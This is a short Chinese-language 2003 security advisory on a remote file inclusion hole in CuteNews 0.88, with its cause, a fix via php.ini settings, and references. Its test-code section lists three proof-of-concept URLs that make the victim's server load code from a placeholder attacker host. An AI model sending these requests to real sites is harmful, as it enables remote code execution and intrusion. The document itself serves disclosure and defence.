CuteNews远程文件包含漏洞发布时间:2003-02-25 更新时间:2003-02-28 严重程度:高 威胁程度:普通用户访问权限 错误类型:输入验证错误 利用方式:服务器模式 BUGTRAQ ID:6935 受影响系统 CutePHP CuteNews 0.88详细描述 CuteNews存在漏洞可导致远程攻击者包含远程服务器上的文件。 CuteNews中多个脚本如shownews.php,search.php,comments.php对cutepath变量缺少正确的处理,可导致攻击者提交恶意参数而指定攻击者拥有的服务器,以WEB权限执行恶意文件中的代码。 测试代码 http://[VICTIM]/cutenews/shownews.php?cutepath=http://[ATTACKER]/ http://[VICTIM]/cutenews/search.php?cutepath=http://[ATTACKER]/ http://[VICTIM]/cutenews/comments.php?cutepath=http://[ATTACKER]/ with : http://[ATTACKER]/config.php http://[ATTACKER]/news.txt 解决方案 设置Php.ini,设置'allow_url_fopen'和'register_globals'为'off'。 相关信息 "Over_G" <overg@mail.ru>. 参考:http://www.securityfocus.com/archive/1/313096 相关主页:http://air.langame.net/cutenews/index.php |
